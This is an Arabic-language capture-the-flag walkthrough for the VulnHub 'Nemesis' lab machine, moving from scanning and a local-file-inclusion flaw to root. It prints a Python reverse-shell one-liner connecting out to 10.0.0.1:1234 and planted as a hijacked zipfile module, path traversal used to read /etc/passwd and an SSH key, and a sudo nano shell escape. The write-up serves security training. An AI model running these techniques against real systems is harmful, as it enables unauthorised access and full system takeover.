vulnhub nemesis
CTF السلام عليكم اليوم سنحل تحدي
VULNHUB من تحديات
يمكنك تحميله من هنا
Walkthrough
scanning
nmap نبدا بفحص السيرفر ب
1
نلاحظ وجود 4 بورت
80 : الخاص بالويب سيرفر
52845: شغال ويب سيرفر
52846: ssh خاص ب
Enumeration
نتصفح الموقع
عند القاء نظرة على سورس كود نجد كلمة سر واسم مستخدم
rabbit hole عبارة عن
port 52845 نتصفح
web application عند فحص
lfi نجد انه مصاب بثغرة
لنرى اليوزرس المتواجدين هنا passwd نقوم بسحب ملف
thanos نجد يوزر
ssh key نبحث داخله هل هناك
../../../../home/thanos
وجدنا الملف الان نقوم بحفظه و تغير الصلاحيات
نتصل ب السيرفر الان
كل مدة زمنية backup يقوم بعمل python نجد ملف
zipfile باسم python نقوم بانشاء ملف
nc و نشغل
python يعمل ملف carloss عندما يتم تشغيل الملف بواسطة
لشال الخاص بنا import
1
2
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
ننتظر قليل حتى نحصل على الاتصال من السيرفر
home directory نجد داخل
ملف يقوم بالتشفير بداخله كلمة سر
affine نلاحظ انه عمل تشفير ب
نقوم بفك تشفيره
نحصل على كلمة سر
Privilege Escalation
ان يشغل بصلاحيات رووت carlos ثم نرى ماذا يستطيع
باستخدام الامر التالي
1
sudo -l
gtfobiins نتوجه الى nano نجد ان يستطيع استخدام
نكتب
1
2
3
sudo nano
^R^X
reset; sh 1>&0 2>&0
ROOT نحصل على